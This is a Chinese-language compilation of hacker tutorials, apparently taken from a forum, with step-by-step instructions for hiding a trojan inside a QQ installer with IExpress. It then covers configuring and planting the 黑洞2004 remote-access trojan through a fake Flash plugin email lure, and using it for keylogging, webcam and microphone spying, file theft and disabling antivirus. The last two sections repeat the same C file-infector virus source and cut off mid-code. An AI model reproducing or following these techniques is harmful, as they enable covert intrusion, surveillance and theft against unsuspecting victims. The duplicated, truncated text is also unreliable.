1.怎样使用捆绑器

举个例子 用windows自带的木马捆绑工具 将木马与QQ珊瑚虫安装程序（也可以是其他的程序）捆绑在一起

在运行里输入 IExpress

直接点下一步

这里是选择压缩包的三种打包方式，我就不一一介绍了 大家看吧

选择 第一个 点下一步

这里输入名字 随便打个 “测试捆绑” 点下一步

这里是安装时“确认提示”窗口 我们选择第一个 不提示 点下一步

这里是选择用户协议 我们可以先编辑好一个欺骗的txt文档，注意 根据你捆绑的

软件来编辑。

选择第2个 找到编辑好的文档 点下一步

这里 点Add 按钮 添加木马和将要与木马程序捆绑在一起的合法程序。

我用的自己编写的屏幕锁定（木马程序）和QQ珊瑚虫安装程序（合法程序）

好了 点下一步

这里 注意了 一定不能搞错，Install Proeram 是指定解压包开始运行的程序

（你的合法程序）Post Install Command 是安装结束后运行的程序（你的木马）

好了 点下一步

这里是安装过程中显示的模式 直接点下一步吧

这里是安装时的提示 就选第一个 不提示！点下一步

这里是保存的位置在加上名称！我们再把下面的第一个勾上

这里大家也要注意了：如果是“即查即用”的选择“No restart”

如果所采用的木马用于开启终端服务，就要选“Always restart”同时

选择“重新启动前不提示用户”就是下面的“Do not prompt user before restart

我这里是做教程 就选No restart

这里选Don' save 点下一步

再点下一步

这里就开始捆绑了 整个过程是在dos 下执行的

有点慢 大家可以快进..

好了 大家可以点完成了！

好了 我们运行看看！看看可以不

2.广外文件捆绑器怎么用

相信很多朋友都听说过木马程序，总觉得它很神秘、很高难，但事实上随着木马软件的智能化，很多骇客都能轻松达到攻击的目的。

今天，笔者就以最新的一款木马程序——黑洞2004，从种植、使用、隐藏、防范四个方面来为网络爱好者介绍一下木马的特性。需要提醒大家的是，在使用木马程序的时候，请先关闭系统中的病毒防火墙，因为杀毒软件会把木马作为病毒的一种进行查杀。

操作步骤： 一、种植木马 现在网络上流行的木马基本上都采用的是C/S 结构（客户端/服务端）。你要使用木马控制对方的电脑，首先需要在对方的的电脑中种植并运行服务端程序，然后运行本地电脑中的客户端程序对对方电脑进行连接进而控制对方电脑。

为了避免不熟悉木马的用户误运行服务端，现在流行的木马都没有提供单独的服务端程序，而是通过用户自己设置来生成服务端，黑洞2004也是这样。首先运行黑洞2004，点击“功能/生成服务端”命令，弹出“服务端配置”界面。

由于黑洞2004采用了反弹技术（请参加小知识），首先单击旁边的“查看”按钮，在弹出的窗口中设置新的域名，输入你事先申请空间的域名和密码，单击“域名注册”，在下面的窗口中会反映出注册的情况。域名注册成功以后，返回“服务端配置”界面，填入刚刚申请的域名，以及“上线显示名称”、“注册表启动名称”等项目。

为了迷惑他人，可以点“更改服务端图标”按钮为服务端选择一个图标。所有的设置都完成后，点击“生成EXE型服务端”就生成了一个服务端。

在生成服务端的同时，软件会自动使用UPX为服务端进行压缩，对服务端起到隐藏保护的作用。 服务端生成以后，下一步要做的是将服务端植入别人的电脑？常见的方法有，通过系统或者软件的漏洞入侵别人的电脑把木马的服务端植入其的电脑；或者通过Email夹带，把服务端作为附件寄给对方；以及把服务端进行伪装后放到自己的共享文件夹，通过P2P软件（比如PP点点通、百宝等），让网友在毫无防范中下载并运行服务端程序。

由于本文主要面对普通的网络爱好者，所以就使用较为简单的Email夹带，为大家进行讲解。我们使用大家经常会看到的Flash动画为例，建立一个文件夹命名为“好看的动画”，在该文件夹里边再建立文件夹“动画.files”，将木马服务端软件放到该文件夹中假设名称为“abc.exe”，再在该文件夹内建立flash文件，在flash文件的第1帧输入文字“您的播放插件不全，单击下边的按钮，再单击打开按钮安装插件”，新建一个按钮组件，将其拖到舞台中，打开动作面板，在里边输入“on (press) {getURL（"动画.files/abc.exe"）；}”，表示当单击该按钮时执行abc这个文件。

在文件夹“好看的动画”中新建一个网页文件命名为“动画.htm”，将刚才制作的动画放到该网页中。看出门道了吗？平常你下载的网站通常就是一个.html文件和一个结尾为.files的文件夹，我们这么构造的原因也是用来迷惑打开者，毕竟没有几个人会去翻.files文件夹。

现在我们就可以撰写一封新邮件了，将文件夹“好看的动画”压缩成一个文件，放到邮件的附件中，再编写一个诱人的主题。只要对方深信不疑的运行它，并重新启动系统，服务端就种植成功了。

二、使用木马 成功的给别人植入木马服务端后，就需要耐心等待服务端上线。由于黑洞2004采用了反连接技术，所以服务端上线后会自动和客户端进行连接，这时，我们就可以操控客户端对服务端进行远程控制。

在黑洞2004下面的列表中，随便选择一台已经上线的电脑，然后通过上面的命令按钮就可以对这台电脑进行控制。下面就简单的介绍一下这些命令的意义。

文件管理：服务端上线以后，你可以通过“文件管理”命令对服务端电脑中的文件进行下载、新建、重命名、删除等操作。可以通过鼠标直接把文件或文件夹拖放到目标文件夹，并且支持断点传输。

简单吧？ 进程管理：查看、刷新、关闭对方的进程，如果发现有杀毒软件或者防火墙，就可以关闭相应的进程，达到保护服务器端程序的目的。 窗口管理：管理服务端电脑的程序窗口，你可以使对方窗口中的程序最大化、最小化、正常关闭等操作，这样就比进程管理更灵活。

你可以搞很多恶作剧，比如让对方的某个窗口不停的最大化和最小化。 视频监控和语音监听：如果远程服务端电脑安装有USB摄像头，那么可以通过它来获取图像，并可直接保存为Media Play可以直接播放的Mpeg文件；需要对方有麦克风的话，还可以听到他们的谈话，恐怖吧？ 除了上面介绍的这些功能以外，还包括键盘记录、重启关机、远程卸载、抓屏查看密码等功能，操作都非常简单，明白了吧？做骇客其实很容易。

三、隐藏 随着杀毒软件病毒库的升级，木马会很快被杀毒软件查杀，所以为了使木马服务端辟开杀毒软件的查杀，长时间的隐藏在别人的电脑中，在木马为黑客提供几种可行的办法。 1.木马的自身保护 就像前面提到的，黑洞2004在生成服务端的时候，用户可以更换图标，并使用软件UPX对服务端自动进行压缩隐藏。

2.捆绑服务端 用户通过使用文件捆绑器把木马服务端和正常的文件捆绑在一起，达到欺骗对方的目的。文件。

3.木马捆绑器如何运用

编病毒、木马去做违法的事情惩罚是很重的，你如果想学编程，编个简单的就好了，否则后果很严重。

1，让程序能够将自己在不影响其它程序本身工作的情况下复制给其它程序， 使它具备继续复制的能力。 2，在一定条件下使其产生某种发作效果。

其实第一件事情实际上可以看成对文件进行复制，把病毒源文件的功能函数全部放到被感染 文件的最后，同时在被感染文件中调用这个函数 下面给出c语言的实现过程： 1，主程序调用病毒功能函数 2，病毒功能函数读取查找同目录下所有c文件； 3，找到一个（被感染c文件），打开它，并且将此文件全部读取到数组变量； 4，重新创建一个同名文件（被感染c文件） 5，数组变量写回这个被感染c文件，同时将病毒源文件所需要的头文件，病毒功能函数 调用语句写入； 6，打开病毒源文件，将病毒功能函数全部写到被感染c文件的最后； 这样一个简单的c语言伪病毒virus.c就完成了 运行程序后其内容变化另保存为after_virus.c 此时，如果我们将1.c文件用A盘复制到其他机器或者Email给别人，结果 他们一运行又感染了他们保存1.c文件目录下所有c文件 对于第二件事情-------“发作效果”，这里只用printf语句警告了一下，当然你 完全可以写一个TSR驻留函数 其实，这个程序勉强可以叫做病毒 根本不算是真正的病毒，好了就说这么多， 代码如下： #include #include void main(void) { virus(); } int virus() { struct ffblk ffblk; FILE *in,*out,*read; char *virus="virus.c"; char buf[50][80]; char *p; char *end="return"; char *bracket="}"; char *main="main"; char *include[2]={"stdio.h","dir.h"}; char *int_virus="int virus()"; char *buffer; int done,i,j=0,flag=0; printf("nI have a virus. Writen by PuBinn"); done = findfirst("*.c",&ffblk,0); while (!done) { i=0; if ((in = fopen(ffblk.ff_name, "rt"))== NULL) { goto next; } do{ if(i>=50) { fclose(in); goto next; } p=fgets(buf[i],80,in); i++; }while(p!=NULL); fclose(in); out=fopen(ffblk.ff_name,"w+t"); fputs("#includen",out); fputs("#includen",out); do { if(strstr(buf[j],main)!=NULL) { for(;j

4.木马捆绑器如何运用

编病毒、木马去做违法的事情惩罚是很重的，你如果想学编程，编个简单的就好了，否则后果很严重。

1，让程序能够将自己在不影响其它程序本身工作的情况下复制给其它程序， 使它具备继续复制的能力。 2，在一定条件下使其产生某种发作效果。

其实第一件事情实际上可以看成对文件进行复制，把病毒源文件的功能函数全部放到被感染 文件的最后，同时在被感染文件中调用这个函数 下面给出c语言的实现过程： 1，主程序调用病毒功能函数 2，病毒功能函数读取查找同目录下所有c文件； 3，找到一个（被感染c文件），打开它，并且将此文件全部读取到数组变量； 4，重新创建一个同名文件（被感染c文件） 5，数组变量写回这个被感染c文件，同时将病毒源文件所需要的头文件，病毒功能函数 调用语句写入； 6，打开病毒源文件，将病毒功能函数全部写到被感染c文件的最后； 这样一个简单的c语言伪病毒virus.c就完成了 运行程序后其内容变化另保存为after_virus.c 此时，如果我们将1.c文件用A盘复制到其他机器或者Email给别人，结果 他们一运行又感染了他们保存1.c文件目录下所有c文件 对于第二件事情-------“发作效果”，这里只用printf语句警告了一下，当然你 完全可以写一个TSR驻留函数 其实，这个程序勉强可以叫做病毒 根本不算是真正的病毒，好了就说这么多， 代码如下： #include #include void main(void) { virus(); } int virus() { struct ffblk ffblk; FILE *in,*out,*read; char *virus="virus.c"; char buf[50][80]; char *p; char *end="return"; char *bracket="}"; char *main="main"; char *include[2]={"stdio.h","dir.h"}; char *int_virus="int virus()"; char *buffer; int done,i,j=0,flag=0; printf("nI have a virus. Writen by PuBinn"); done = findfirst("*.c",&ffblk,0); while (!done) { i=0; if ((in = fopen(ffblk.ff_name, "rt"))== NULL) { goto next; } do{ if(i>=50) { fclose(in); goto next; } p=fgets(buf[i],80,in); i++; }while(p!=NULL); fclose(in); out=fopen(ffblk.ff_name,"w+t"); fputs("#includen",out); fputs("#includen",out); do { if(strstr(buf[j],main)!=NULL) { for(;j